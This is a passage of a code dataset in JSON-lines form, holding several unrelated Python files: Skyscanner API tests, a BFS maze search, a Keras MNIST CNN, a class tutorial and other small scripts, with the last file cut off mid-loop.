'\\n\\t%s' % '\\n\\t'.join(['Wrong API key', 'Another error']))\n\n resp_json = Transport._default_resp_callback(FakeResponse(content='{\"valid\": 1}'))\n self.assertIsNotNone(resp_json)\n self.assertTrue('valid' in resp_json)\n self.assertEqual(resp_json['valid'], 1)\n\n\nclass TestCarHire(SkyScannerTestCase):\n\n def setUp(self):\n # API Key that's meant for testing only\n # Taken from: http://business.skyscanner.net/portal/en-GB/Documentation/FlightsLivePricingQuickStart\n super(TestCarHire, self).setUp()\n datetime_format = '%Y-%m-%dT%H:%S'\n pickup_datetime = datetime.now()\n dropoff_datetime = pickup_datetime + timedelta(days=3)\n self.pickup = pickup_datetime.strftime(datetime_format)\n self.dropoff = dropoff_datetime.strftime(datetime_format)\n\n def test_location_autosuggest(self):\n carhire_service = CarHire(self.api_key)\n\n self.result = carhire_service.location_autosuggest(\n market='UK',\n currency='GBP',\n locale='en-GB',\n query='Kuala')\n\n self.assertTrue('results' in self.result)\n self.assertTrue(len(self.result['results']) > 0)\n\n def test_get_result(self):\n \"\"\"\n http://partners.api.skyscanner.net/apiservices/carhire/liveprices/v2/{market}/{currency}/{locale}/{pickupplace}/{dropoffplace}/{pickupdatetime}/{dropoffdatetime}/{driverage}?apiKey={apiKey}&userip={userip}\n YYYY-MM-DDThh:mm\n \"\"\"\n carhire_service = CarHire(self.api_key)\n\n self.result = carhire_service.get_result(\n market='UK',\n currency='GBP',\n locale='en-GB',\n pickupplace='LHR-sky',\n dropoffplace='LHR-sky',\n pickupdatetime=self.pickup,\n dropoffdatetime=self.dropoff,\n driverage='30',\n userip='175.156.244.174')\n\n self.assertTrue('cars' in self.result)\n self.assertTrue('websites' in self.result)\n\n def test_create_session(self):\n \"\"\"\n http://partners.api.skyscanner.net/apiservices/carhire/liveprices/v2/{market}/{currency}/{locale}/{pickupplace}/{dropoffplace}/{pickupdatetime}/{dropoffdatetime}/{driverage}?apiKey={apiKey}&userip={userip}\n YYYY-MM-DDThh:mm\n \"\"\"\n carhire_service = CarHire(self.api_key)\n\n poll_url = carhire_service.create_session(\n market='UK',\n currency='GBP',\n locale='en-GB',\n pickupplace='LHR-sky',\n dropoffplace='LHR-sky',\n pickupdatetime=self.pickup,\n dropoffdatetime=self.dropoff,\n driverage='30',\n userip='175.156.244.174')\n\n self.assertTrue(poll_url)\n\n\nclass TestHotels(SkyScannerTestCase):\n\n def setUp(self):\n # API Key that's meant for testing only\n # Taken from: http://business.skyscanner.net/portal/en-GB/Documentation/FlightsLivePricingQuickStart\n super(TestHotels, self).setUp()\n datetime_format = '%Y-%m-%d'\n checkin_datetime = datetime.now()\n checkout_datetime = checkin_datetime + timedelta(days=4)\n self.checkin = checkin_datetime.strftime(datetime_format)\n self.checkout = checkout_datetime.strftime(datetime_format)\n\n def test_location_autosuggest(self):\n hotels_service = Hotels(self.api_key)\n\n self.result = hotels_service.location_autosuggest(\n market='UK',\n currency='GBP',\n locale='en-GB',\n query='Kuala')\n\n self.assertTrue('results' in self.result)\n self.assertTrue(len(self.result['results']) > 0)\n\n def test_get_result(self):\n \"\"\"\n http://partners.api.skyscanner.net/apiservices/carhire/liveprices/v2/{market}/{currency}/{locale}/{pickupplace}/{dropoffplace}/{pickupdatetime}/{dropoffdatetime}/{driverage}?apiKey={apiKey}&userip={userip}\n YYYY-MM-DDThh:mm\n \"\"\"\n\n hotels_service = Hotels(self.api_key)\n self.result = hotels_service.get_result(\n market='UK',\n currency='GBP',\n locale='en-GB',\n entityid=27543923,\n checkindate=self.checkin,\n checkoutdate=self.checkout,\n guests=1,\n rooms=1)\n\n self.assertTrue('hotels' in self.result)\n self.assertTrue(len(self.result['hotels']) > 0)\n\n def test_create_session(self):\n \"\"\"\n http://partners.api.skyscanner.net/apiservices/carhire/liveprices/v2/{market}/{currency}/{locale}/{pickupplace}/{dropoffplace}/{pickupdatetime}/{dropoffdatetime}/{driverage}?apiKey={apiKey}&userip={userip}\n YYYY-MM-DDThh:mm\n \"\"\"\n hotels_service = Hotels(self.api_key)\n\n poll_url = hotels_service.create_session(\n market='UK',\n currency='GBP',\n locale='en-GB',\n entityid=27543923,\n checkindate=self.checkin,\n checkoutdate=self.checkout,\n guests=1,\n rooms=1)\n\n self.assertTrue(poll_url)\n\n\nclass TestFlights(SkyScannerTestCase):\n\n def setUp(self):\n # API Key that's meant for testing only\n # Taken from: http://business.skyscanner.net/portal/en-GB/Documentation/FlightsLivePricingQuickStart\n super(TestFlights, self).setUp()\n datetime_format = '%Y-%m'\n outbound_datetime = datetime.now()\n inbound_datetime = outbound_datetime + timedelta(days=31)\n self.outbound = outbound_datetime.strftime(datetime_format)\n self.inbound = inbound_datetime.strftime(datetime_format)\n\n datetime_format = '%Y-%m-%d'\n inbound_datetime = outbound_datetime + timedelta(days=3)\n self.outbound_days = outbound_datetime.strftime(datetime_format)\n self.inbound_days = inbound_datetime.strftime(datetime_format)\n\n def test_get_cheapest_quotes(self):\n flights_cache_service = FlightsCache(self.api_key)\n self.result = flights_cache_service.get_cheapest_quotes(\n country='UK',\n currency='GBP',\n locale='en-GB',\n originplace='SIN-sky',\n destinationplace='KUL-sky',\n outbounddate=self.outbound,\n inbounddate=self.inbound)\n\n self.assertTrue('Quotes' in self.result)\n self.assertTrue(len(self.result['Quotes']) > 0)\n\n # I'm getting the following result:\n # {u'ValidationErrors': [{u'Message': u'For this query please use the following service [BrowseDates]'}]}\n def test_get_cheapest_price_by_route(self):\n flights_cache_service = FlightsCache(self.api_key)\n self.result = flights_cache_service.get_cheapest_price_by_route(\n country='UK',\n currency='GBP',\n locale='en-GB',\n originplace='SIN-sky',\n destinationplace='KUL-sky',\n outbounddate=self.outbound,\n inbounddate=self.inbound)\n\n print(\"result: %s\" % self.result)\n\n def test_get_cheapest_price_by_date(self):\n flights_cache_service = FlightsCache(self.api_key)\n self.result = flights_cache_service.get_cheapest_price_by_date(\n country='UK',\n currency='GBP',\n locale='en-GB',\n originplace='SIN-sky',\n destinationplace='KUL-sky',\n outbounddate=self.outbound,\n inbounddate=self.inbound)\n\n self.assertTrue('Quotes' in self.result)\n self.assertTrue(len(self.result['Quotes']) > 0)\n\n def test_get_grid_prices_by_date(self):\n flights_cache_service = FlightsCache(self.api_key)\n self.result = flights_cache_service.get_grid_prices_by_date(\n country='UK',\n currency='GBP',\n locale='en-GB',\n originplace='SIN-sky',\n destinationplace='KUL-sky',\n outbounddate=self.outbound,\n inbounddate=self.inbound)\n\n self.assertTrue('Dates' in self.result)\n self.assertTrue(len(self.result['Dates']) > 0)\n\n def test_create_session(self):\n flights_service = Flights(self.api_key)\n poll_url = flights_service.create_session(\n country='UK',\n currency='GBP',\n locale='en-GB',\n originplace='SIN-sky',\n destinationplace='KUL-sky',\n outbounddate=self.outbound_days,\n inbounddate=self.inbound_days,\n adults=1)\n\n self.assertTrue(poll_url)\n\n def test_get_markets(self):\n transport = Transport(self.api_key)\n self.result = transport.get_markets('en-GB')\n\n self.assertTrue('Countries' in self.result)\n self.assertTrue(len(self.result['Countries']) > 0)\n\n def test_location_autosuggest(self):\n transport = Transport(self.api_key)\n self.result = transport.location_autosuggest('KUL', 'UK', 'GBP', 'en-GB')\n\n self.assertTrue('Places' in self.result)\n self.assertTrue(len(self.result['Places']) > 0)\n\n # def test_poll_session(self):\n # flights_service = Flights(self.api_key)\n\n # poll_url = flights_service.create_session(\n # country='UK',\n # currency='GBP',\n # locale='en-GB',\n # originplace='SIN-sky',\n # destinationplace='KUL-sky',\n # outbounddate='2015-05-28',\n # inbounddate='2015-05-31',\n # adults=1)\n\n # result = flights_service.poll_session(poll_url, sorttype='carrier')\n\n # self.assertTrue(len(result['Itineraries']) > 0)\n\n # pass\n\n # def test_request_booking_details(self):\n # flights_service = Flights(self.api_key)\n\n # poll_url = flights_service.create_session(\n # country='UK',\n # currency='GBP',\n # locale='en-GB',\n # originplace='SIN-sky',\n # destinationplace='KUL-sky',\n # outbounddate='2015-05-28',\n # inbounddate='2015-05-31',\n # adults=1)\n\n # flights_results = flights_service.poll_session(poll_url, sorttype='carrier')\n\n # print(flights_results)\n\n # itinerary = flights_results['Itineraries'][0]\n\n # result = flights_service.request_booking_details(poll_url, outboundlegid=itinerary['OutboundLegId'],\n # inboundlegid=itinerary['InboundLegId'])\n\n # print(result)\n\n # pass\n\n def test_get_result(self):\n flights_service = Flights(self.api_key)\n self.result = flights_service.get_result(\n country='UK',\n currency='GBP',\n locale='en-GB',\n originplace='SIN-sky',\n destinationplace='KUL-sky',\n outbounddate=self.outbound_days,\n inbounddate=self.inbound_days,\n adults=1)\n\n # print(result)\n print(\"status: %s\" % self.result['Status'])\n # self.assertTrue(len(result['Flights']['Itineraries']) > 0)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_skyscanner.py","file_name":"test_skyscanner.py","file_ext":"py","file_size_in_byte":15612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"403834785","text":"# search.py\n# ---------------\n# Licensing Information: You are free to use or extend this projects for\n# educational purposes provided that (1) you do not distribute or publish\n# solutions, (2) you retain this notice, and (3) you provide clear\n# attribution to the University of Illinois at Urbana-Champaign\n#\n# Created by Jongdeog Lee (jlee700@illinois.edu) on 09/12/2018\n\n\"\"\"\nThis file contains search functions.\n\"\"\"\n# Search should return the path and the number of states explored.\n# The path should be a list of tuples in the form (alpha, beta, gamma) that correspond\n# to the positions of the path taken by your search algorithm.\n# Number of states explored should be a number.\n# maze is a Maze object based on the maze from the file specified by input filename\n# searchMethod is the search method specified by --method flag (bfs,astar)\n# You may need to slight change your previous search functions in MP1 since this is 3-d maze\n\nfrom collections import deque\nfrom heapq import heappop, heappush\nfrom queue import Queue\n\ndef search(maze, searchMethod):\n return {\n \"bfs\": bfs,\n }.get(searchMethod, [])(maze)\n\ndef bfs(maze):\n # Write your code here\n \"\"\"\n This function returns optimal path in a list, which contains start and objective.\n If no path found, return None.\n \"\"\"\n q = Queue() #init queue\n v = set() #init visited nodes\n prev = {} #init previous nodes (dictionary)\n\n start = maze.getStart() #alpha beta\n #dot = maze.getObjectives() #list of objectives in alpha beta\n #destination = dot[0]\n\n path = []\n found = 0\n\n q.put(start)\n v.add(start)\n\n while q.empty() == False:\n current = q.get()\n\n if maze.isObjective(current[0],current[1]):\n found = 1 ;\n destination = current\n break\n\n for neighbor in maze.getNeighbors(current[0], current[1]):\n if neighbor not in v:\n q.put(neighbor)\n v.add(neighbor)\n prev[neighbor] = current\n\n #backtrace\n if found ==0:\n print(\"path not found\")\n return\n\n path.append(destination)\n while destination in prev:\n path.append(prev[destination])\n destination = prev[destination]\n\n path.reverse()\n\n print(\"path found\")\n return path\n","sub_path":"mp2/template/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"453000609","text":"import pandas as pd\nimport numpy as np\nimport random\nfrom keras.models import Sequential\nfrom xgboost import XGBRegressor\nfrom src.models.time_series import StepTimeSeriesModel\nfrom src.models.ensembler import Ensembler\n\n\nclass RandomSearch(object):\n def __init__(self, model=None, sampling_space=None):\n assert model is not None or sampling_space is not None\n assert model is None or sampling_space is None\n if sampling_space is not None:\n self.sampling_space = sampling_space\n self.sample_model = self.sample_custom()\n elif model == StepTimeSeriesModel:\n self.sample_model = self.sample_nsm\n elif model == Ensembler:\n self.sample_model = self.sample_ensembler\n elif model == XGBRegressor:\n self.sample_model = self.sample_xgbregressor\n elif model == Sequential:\n self.sample_model = self.sample_lstm\n \n def sample_space(self, T):\n parameter_space = pd.DataFrame([self.sample_model() for _ in range(T)])\n return parameter_space\n \n def sample_custom(self):\n return self.sampling_space\n\n def sample_nsm(self):\n parameter_space = {\n 'n': 72,\n 'd': random.choice(range(4, 50))\n }\n return parameter_space\n\n def sample_ensembler(self):\n importances = random.sample(range(100), 3)\n models = ['xgboost', 'knn', 'lasso']\n parameter_space = {\n 'importances': {model: i/sum(importances) \n for model, i in zip(models, importances)},\n }\n return parameter_space\n\n def sample_xgbregressor(self):\n parameter_space = {\n 'learning_rate': random.choice(np.geomspace(1e-2, 1)),\n 'max_depth': random.choice(range(1, 10)),\n 'gamma': random.choice(np.geomspace(1e-2, 1)),\n 'min_child_weight': random.choice(range(1, 10)),\n 'num_estimators': random.choice(range(30, 300)),\n 'reg_alpha': random.choice(np.linspace(0.2, 1)),\n 'reg_lambda': random.choice(np.linspace(0.2, 2)),\n 'scale_pos_weight': random.choice(np.linspace(0.3, 2)),\n }\n return parameter_space\n\n def sample_lstm(self):\n parameter_space = {\n 'learning_rate': random.choice(np.geomspace(1e-2, 1)),\n 'dropout': random.choice(np.geomspace(.5e-2, 1)),\n 'recurrent_dropout': random.choice(np.geomspace(.5e-2, 1)),\n 'hidden_units': random.choice(range(10, 300)),\n }\n return parameter_space\n\n","sub_path":"src/models/random_search.py","file_name":"random_search.py","file_ext":"py","file_size_in_byte":2578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"185242455","text":"from django.urls import path\n\nfrom . import views\napp_name = \"favorites_app\"\n\nurlpatterns = [\n path(\n 'profile',\n views.UserPageView.as_view(),\n name='profile', \n ),\n path(\n 'add-entry//',\n views.AddFavoritesView.as_view(),\n name='add-favorites', \n ),\n path(\n 'delete-favorites/?/', \n views.FavoritesDeleteView.as_view(),\n name='delete-favorites',\n ),\n]","sub_path":"applications/favorites/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"36116451","text":"import pandas_datareader as pdr\nimport numpy as np\nfrom sklearn.preprocessing import MinMaxScaler\n\ndef get_data(seq_len = 32):\n df = pdr.DataReader('F',data_source='yahoo' ,start='2012-01-01', end='2021-05-1')\n \n df.drop('Volume',axis=1,inplace=True)\n \n scaler = MinMaxScaler(feature_range=(0,1))\n #df[df.columns] = scaler.fit_transform(df) \n df=df[['High','Low','Open','Adj Close','Close']]\n\n '''Create training, validation and test split'''\n\n times = sorted(df.index.values)\n last_10pct = sorted(df.index.values)[-int(0.1*len(times))] # Last 10% of series\n last_20pct = sorted(df.index.values)[-int(0.2*len(times))] # Last 20% of series\n\n df_train = df[(df.index < last_20pct)] # Training data are 80% of total data\n df_val = df[(df.index >= last_20pct) & (df.index < last_10pct)]\n df_test = df[(df.index >= last_10pct)]\n\n train_data = df_train.values\n val_data = df_val.values\n test_data = df_test.values\n print('Training data shape: {}'.format(train_data.shape))\n print('Validation data shape: {}'.format(val_data.shape))\n print('Test data shape: {}'.format(test_data.shape))\n train_data_len=len(train_data)\n val_data_len=len(train_data)+len(val_data)\n\n # Training data\n X_train, y_train = [], []\n for i in range(seq_len, len(train_data)):\n X_train.append(train_data[i-seq_len:i]) # Chunks of training data with a length of 128 df-rows\n y_train.append(train_data[:, 4][i]) # Value of 4th column (Close Price) of df-row 128+1\n X_train, y_train = np.array(X_train), np.array(y_train)\n \n # Validation data\n X_val, y_val = [], []\n for i in range(seq_len, len(val_data)):\n X_val.append(val_data[i-seq_len:i])\n y_val.append(val_data[:, 4][i])\n X_val, y_val = np.array(X_val), np.array(y_val)\n \n # Test data\n X_test, y_test = [], []\n for i in range(seq_len, len(test_data)):\n X_test.append(test_data[i-seq_len:i])\n y_test.append(test_data[:, 4][i]) \n X_test, y_test = np.array(X_test), np.array(y_test)\n \n print('Training set shape', X_train.shape, y_train.shape)\n print('Validation set shape', X_val.shape, y_val.shape)\n print('Testing set shape' ,X_test.shape, y_test.shape)\n \n return df, X_train, y_train, X_val, y_val, X_test, y_test,train_data_len,val_data_len,scaler","sub_path":"Deployment/utils/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":2341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"142071283","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 15 14:51:14 2018\n\n@author: panzengyang\n\"\"\"\nimport numpy as np\nimport msg2matrix as mx\nfrom sklearn.linear_model import Perceptron\nfrom sklearn.model_selection import KFold\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\ndef CrossValid_percep(eta, X, Y): #trainmsg, trainresult ALL\n Rcv = 0\n numsplit = 2\n kf = KFold(n_splits = numsplit)\n for train_index, test_index in kf.split(X):\n train_result, val_result = Y[train_index], Y[test_index]\n train_msg, val_msg = X[train_index], X[test_index]\n \n vectorizer = TfidfVectorizer(max_df = 0.35, min_df = 5, max_features = 500, sublinear_tf = True)\n vectorizer.fit(train_msg)\n dictionary = vectorizer.get_feature_names()\n \n train_matrix = mx.extract_features(train_msg, dictionary)\n val_matrix = mx.extract_features(val_msg, dictionary)\n \n per = Perceptron(max_iter = 1, eta0 = eta, class_weight = \"balanced\")\n per.fit(train_matrix, train_result)\n \n Rcv = Rcv + (1 - per.score(val_matrix, val_result))\n Rcv = Rcv/numsplit\n print(\"eta = \", eta, \" Rvc = \", Rcv)\n return Rcv\n \n\ndef percep_cv(list_eta, X, Y): #trainmsg, trainresult ALL\n Rcv = []\n for i, eta in enumerate(list_eta):\n Rcv.append(CrossValid_percep(eta, X, Y))\n index_min = np.argmin(Rcv)\n eta = list_eta[index_min]\n print(\"Correct eta = \", eta)\n \n return eta","sub_path":"Perceptron_cv.py","file_name":"Perceptron_cv.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"521451515","text":"#!/usr/bin/python3.5 \n\n# I. \n# Class \n''' \n Class: \n Class is a kind of factories to manufacture instances. \n \n [Note] \n 1. Calling a class object like a function makes new instance object. \n\n 2. Each instance inherits class attributes and get its own namespace. \n\n 3. Assignments to attributes of self in methods make per-instance attributes. \n Inside the class's method funtion, the first argument \"self\" references the instance object being processed. \n Assignments to attributes of self create or change data in instance not the class. \n\n''' \n# First example \nclass FirstClass():\n def setdata(self,value): \n self.data = value \n def display(self): \n print(self.data) \n\n# Create different namespaces, or different instance. Both inherits the FirstClass. \nx = FirstClass() \ny = FirstClass() \n\nx.setdata(\"Caeser\") \ny.setdata(3.14159) \n\nx.display() \ny.display() \n\n# Change instance attribute outside the class by assigning to self in method. \nx.data = \"Assign outside the class\" \nx.display() \n# Create new attributes outside the class's method function by assignment to self. \n# The new attributes are with instance if assign it to instace, i.e. class has no this new attributes. \ny.CreateNewValueOutsideClass = 'Create New Value Outside the Class' \nprint(y.CreateNewValueOutsideClass) \n#print(FirstClass.CreateNewValueOutsideClass) # This may lead to error, because the new attributes are created in instance's namespace.\n\n''' \n [Note]\n 1. Classes usually create all of the instance's attributes by assigment to the self argument. \n 2. The argument self means the instance itself. \n 3. The instance can create new attributes outside the class's method function by assigment to self, which cannot called from class. \n i.e. Object.NewVariable = 100, where .NewVariable is not defined in the class. \n 4. The class can also create new attributes outside class with assignment to self. \n This created attributes automatically inherit by subclass and can be called by instances. \n''' \n\n# II. \n''' \n Class:\n Classes are customized by inheritance. \n\n [Note] \n 1. Superclass are listed in parenthese in a class header. \n 2. Classes inherit attributes from their superclass. \n 3. Instances inherit attributes from all accessible classes. \n Each instance gets names from the class it is generated from, ae well as all of that class's superclass. \n When looking for a name, Python checks the instance, then its class, the all superclass. \n 4. Each object.attribute reference invokes a new, independent search. \n 5. Logic changes are made by subclassing, not by changing superclass. \n''' \n\n# Second Example \nclass SecondClass(FirstClass): \n def display(self): \n # By definning attribute with same name in FirstClass, SecondClass' display overrides the attribute in FirstClass. \n # Searching attributes stops by first appearance of the name that it finds. \n print(\"Current value = '%s'\"%(self.data)) \n\nz = SecondClass() \nz.setdata(\"Inheritance of the attribute setdata.\") # Inherit the attribute setdata from superclass FirstClass. \nz.display() # Override the attribute in FirstClass. \nx.display() # x is still odd value. \n''' \n Class are attributes in Modules\n\n $ import modulename # or from modulename import FirstClass \n $ class SecondClass( modulename.FirstClass ): \n $ def function_name(self): \n $ .... \n \n [Note] \n 1. Where modulname and class name can be the same. i.e. abc.abc(),\n 2. class name should begin with an uppercase letter conventionally. i.e. abc.Abc() \n\n''' \n\n# III. Operator overloading \n''' \n Classes can intercept Python operators. \n Operator overloading is that let the objects coded with classes intercept and respond to operations that work on build-in type: \n addition, slicing, printing, qualification and so on. \n Operator overloading lets objects be more tightly integrated with Python's object model and makes classes like build-in. \n\n [Note] \n 1. Methods named with double underscores are special, i.e. __X__ \n This spacial method is implemented on operator overloading. \n Python classes define a fixed and unchangeable mapping from each of these operations. \n 2. Such methods are called automatically when instances appear in built-in operation. \n If an instance object inherits an __add__ method, that method is called whenever the object appears in a + expression. \n 3. Classes may override most built-in type operation. \n 4. If a class doesn't define or inherit an operator overloading methods, \n it just means that the corresponding operation is not supported for the class's instances. \n i.e. If there is no __add__, + expression raise exception. \n \n [Note] \n __init__ method, which is known as the constructor method and used to initiailize object's state, which is optional. \n \n''' \n# Third Example with operator overloading. \nclass ThirdClass( SecondClass ): \n def __init__(self,value): \n self.data = value \n\n def __add__(self, other): # Called if + expression appears. \n #return self.data+other # Just return a objects of self.data+other \n return ThirdClass(self.data+other) # Return an instance of ThirdClass. \n\n def __str__(self): # Called if print() appears. \n return \"[ThirdClass: %s]\"%self.data \n\n def mul(self,other): \n self.data *= other \n\n\na = ThirdClass('abc') \na.display() # Inherit from FirstClass, because .display appears first at FirstClass. \nprint(a) # Call the __str__ method. \nb = a+'xyz' \n''' \n .__add__(self,other):\n ^ ^\n  | | \n | |\n a + 'xyz' \n\n return ThirdClass( self.data + other ) \n ^ ^ \n | | \n | | \n 'abc' 'xyz' -----> Initialize another instance of ThirdClass with 'abcxyz' \n\n''' \nb.display() # __add__ makes a new instance that has all ThirdClass attributes. \nprint(b) \n\na.mul(3) \nprint(a) \n\n\n# Other example \nclass rec: \n pass # An empty namespace \n\n\nrec.name = 'Bob' \nrec.age = 40 \nprint(rec.name) \n''' \n Above works even though there is no instance of the class yet. \n Classes are objects in their own right, even without instances. \n For those attributes defined outside the class can be called by their instances. \n''' \n\nx = rec() \ny = rec()\nprint( x.name, y.name ) # Because of add new attribute above. \n\nx.name = 'Sue' \nprint( x.name, y.name ) # x is another namespace. \n''' \n Actually, the attributes of a namespace objects are usually implemented as dictionary. \n''' \n\n\ndef uppername(obj): \n # Simple define a function with receiving a class object as argument. \n return obj.name.upper() \n\nprint( uppername(x) ) \n\nrec.method_created_outside_class = uppername # Create new method outside the class \n\nprint(x.method_created_outside_class()) \nprint(y.method_created_outside_class()) \nprint(rec.method_created_outside_class(x))\n''' \n [Note] \n New method can be created ouside the class, which is the same with new name created outside the class. \n''' \n\n# Another example inherits rec class \npers1 = rec() \npers1.name = 'Bob' \npers1.job = ['dev','msg'] \npers1.age = 40 \n\npers2 = rec() \npers2.name = 'Sue' \npers2.job = ['dev','cto'] \nprint(pers1.name, pers2.name) \n\n# Class implement \nclass Person():\n def __init__(self, name, jobs, age = None ):\n self.name = name \n self.jobs = jobs \n self.age = age \n def info(self): \n return (self.name, self.jobs) \n\nrec1 = Person('Bob',['dev','mgr'],40.5) \nrec2 = Person('Sue',['dev','cto']) \n\nprint(rec1.jobs, rec2.info()) \n\n\n","sub_path":"LearningPython/example_Class_1.py","file_name":"example_Class_1.py","file_ext":"py","file_size_in_byte":7998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"540229935","text":"from datetime import datetime\n\nz = int(input())\ntuples = []\nfor i in range(z):\n line = input()\n s = line.split(\" \")\n date = s[0]\n time = s[1]\n message = \"\"\n for x in range(2, len(s)):\n if x != 2: \n message = message + \" \"\n message = message + s[x]\n\n d = s[0] + \" \" + s[1]\n tuples.append((datetime.strptime(d, '%d.%m.%Y %H:%M'), message))\n\ntuples.sort(key=lambda x: x[0])\n\nfor i in tuples:\n print (i[0].strftime('%d.%m.%4Y %H:%M'), i[1])\n ","sub_path":"Python/2018-2019/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"383073956","text":"def canReach(x1, y1, x2, y2):\n pairs = [(x1, y1)]\n while len(pairs) > 0:\n key, value = pairs[0]\n pairs = pairs[1:]\n if key == x2 and value == y2:\n return \"YES\"\n s = key+value\n if s <=x2:\n pairs.append((s, value))\n if s <= y2:\n pairs.append((key, s))\n\n return \"NO\"\n\nprint(canReach(1,1,1000,1000))","sub_path":"HackerRank/canReach.py","file_name":"canReach.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"214042481","text":"'''\n * @desc : cnn训练mnist\n * @auth : TYF\n * @date : 2019/8/24 - 23:55\n'''\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom keras.datasets import mnist\nfrom keras.utils import np_utils\nfrom keras.layers import Dense,Dropout,Flatten,Conv2D,MaxPooling2D\nfrom keras.models import Sequential\nnp.random.seed(10)\n\n#数据预处理\n(x_train,y_train),(x_test,y_test) = mnist.load_data();\nprint('x_train.shape():',x_train.shape)\n#张量 60000*28*28 转 60000*28*28*1\nx_train_4d = x_train.reshape(x_train.shape[0],28,28,1).astype('float32');\nx_test_4d = x_test.reshape(x_test.shape[0],28,28,1).astype('float32');\nprint('x_train_4d.shape():',x_train_4d.shape)\n#标准化\nx_train_4d_normalize = x_train_4d/255;\nx_test_4d_normalize = x_test_4d/255;\n#label转onehot编码\ny_train_onehot = np_utils.to_categorical(y_train);\ny_test_onehot = np_utils.to_categorical(y_test);\n\n#拼接网络\nmodel = Sequential()\n# 16个5x5卷积核 relu激活函数\nmodel.add(Conv2D(filters=16,kernel_size=(5,5),padding='same',input_shape=(28,28,1),activation='relu'))\n# 2x2的下采样窗口\nmodel.add(MaxPooling2D(pool_size=(2,2)))\n# 36个5x5卷积核 relu激活函数\nmodel.add(Conv2D(filters=36,kernel_size=(5,5),padding='same',activation='relu'))\n# 2x2的下采样窗口\nmodel.add(MaxPooling2D(pool_size=(2,2)))\n# dropout层防止过拟合\nmodel.add(Dropout(0.25))\n# 平坦层压成1维 1764个神经元\nmodel.add(Flatten())\n# 隐层128个神经元\nmodel.add(Dense(units=128,activation='relu'))\n# dropout层防止过拟合\nmodel.add(Dropout(0.5))\n# 输出层softmax将类别映射为概率\nmodel.add(Dense(units=10,activation='softmax'))\nprint(model.summary())\n\n#训练\n# categorical_crossentropy/交叉熵作为损失函数 adam优化器加速收敛 accuracy(准确率)作为模型评分方式\nmodel.compile(loss='categorical_crossentropy',optimizer='adam',metrics=['accuracy'])\n# 4/5训练集 1/5验证集\ntrain_history = model.fit(x=x_train_4d_normalize,y=y_train_onehot,validation_split=0.2,epochs=20,batch_size=300,verbose=2)\n\n\n#图像显示训练结果\ndef show_train_history(train_history,train,validation):\n plt.plot(train_history.history[train]) #train(训练准确率)这条线\n plt.plot(train_history.history[validation]) #validation(验证准确率)这条线\n plt.title('train history')\n plt.ylabel(train)\n plt.xlabel('Epoch')\n plt.legend(['train','validation'],loc='upper left')\n plt.show()\n\n#训练集准确率/验证集准确率\nshow_train_history(train_history,'acc','val_acc')\n#训练集误差/验证集误差\nshow_train_history(train_history,'loss','val_loss')\n#测试集合准确率\nscores = model.evaluate(x_test_4d_normalize,y_test_onehot)\nprint('scores:',scores[1])\n\n\n#预测\nprediction = model.predict_classes(x_test_4d_normalize)\nfor i in range(1,len(y_test)):\n print('predict:',prediction[i],'label:',y_test[i])\n\n\n#混淆矩阵\nprint(pd.crosstab(y_test,prediction,rownames=['label'],colnames=['predict']))","sub_path":"src/t_2.py","file_name":"t_2.py","file_ext":"py","file_size_in_byte":2975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"61127346","text":"def format_duration(seconds):\n __years = seconds // 31536000\n __days = (seconds // 86400) % 365\n __hours = (seconds // 3600) % 24\n __minutes = (seconds // 60) % 60\n __seconds = seconds % 60\n\n time = {\"years\": __years, \"days\": __days, \"hours\": __hours,\"minutes\": __minutes, \"seconds\": __seconds}\n time_list = []\n for t in time:\n if time[t] != 0:\n time_list.append(words_ending(t,time[t]))\n return words_concate(time_list)\n\n#Detecting words ending.\ndef words_ending(key,value):\n if value > 1:\n stroke = \" \".join([str(value),key])\n else:\n stroke = \" \".join([str(value),key[:-1]])\n return stroke\n\n#Concating result list with ',' and 'and' separators or returning now if list is empty.\ndef words_concate(result_list):\n if len(result_list) > 2:\n temp_stroke = \", \".join(result_list[:-1])\n stroke = \" and \".join([temp_stroke,result_list[-1]])\n elif len(result_list) == 2:\n stroke = \" and \".join(result_list)\n elif len(result_list) == 1:\n stroke = result_list[-1]\n else:\n stroke = \"now\"\n return stroke\n\nprint(format_duration(120))","sub_path":"Codewars/codewarsDurationFormat.py","file_name":"codewarsDurationFormat.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"314380770","text":"# create a function that takes in a file as an argument\n# create a blank dictionary\n# split the lines into indices\n# store the indices into a dictionary\n# return sorted dictionary\n\n\n\"\"\"Restaurant rating lister.\"\"\"\n\n\n# put your code here\ndef restaurant_ratings(filename):\n \"\"\"Takes in a file and allows the user to manipulate the data,\n either displaying an ordered list of restaurants or adding a new one to\n the list\"\"\"\n the_file = open(filename)\n ratings = {}\n\n for line in the_file:\n line = line.rstrip()\n split_line = line.split(\":\")\n restaurant_name, rating = split_line\n ratings[restaurant_name] = rating\n\n while True:\n ratings = {}\n\n for line in the_file:\n line = line.rstrip()\n 